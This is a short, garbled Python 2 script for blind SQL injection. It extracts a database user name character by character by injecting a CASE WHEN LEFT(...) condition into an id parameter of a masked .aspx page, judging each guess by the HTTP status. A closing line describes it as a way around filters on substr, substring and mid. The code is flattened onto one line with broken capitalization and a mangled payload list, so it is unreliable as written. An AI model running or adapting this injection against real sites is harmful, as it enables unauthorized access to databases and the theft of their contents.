#encodeing =utf-8import requestsimport sys reload (SYS) Sys.setdefaultencoding (' utf-8 ') payloads = List (' [Email protected]_. ') headers = {' Cache-control ': ' max-age=0 ', ' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,*/*;q=0.8 ', ' upgrade-insecure-requests ': ' 1 ', ' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/45.0.2454.101 safari/537.36 ', ' accept-encoding ': ' gzip, deflate, Sdch ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' Cookie ': ' ***************************************** '} print ' Test ... ' User= "" For I in Range (1,7): For payload in Payloads:user+=payload aaa= "--" d= "(the Case if (Left (US er,%s)) = '%s ' then 1 else 0 end) "% (i,user) test = d + AAA r=requests.get (' http://**********/******.aspx?id= 203263/' +test,headers=headers) if r.status_code==200:print user break else: USER=USER[:-1]
Disable SQL injection scripts for substr, substring, and mid functions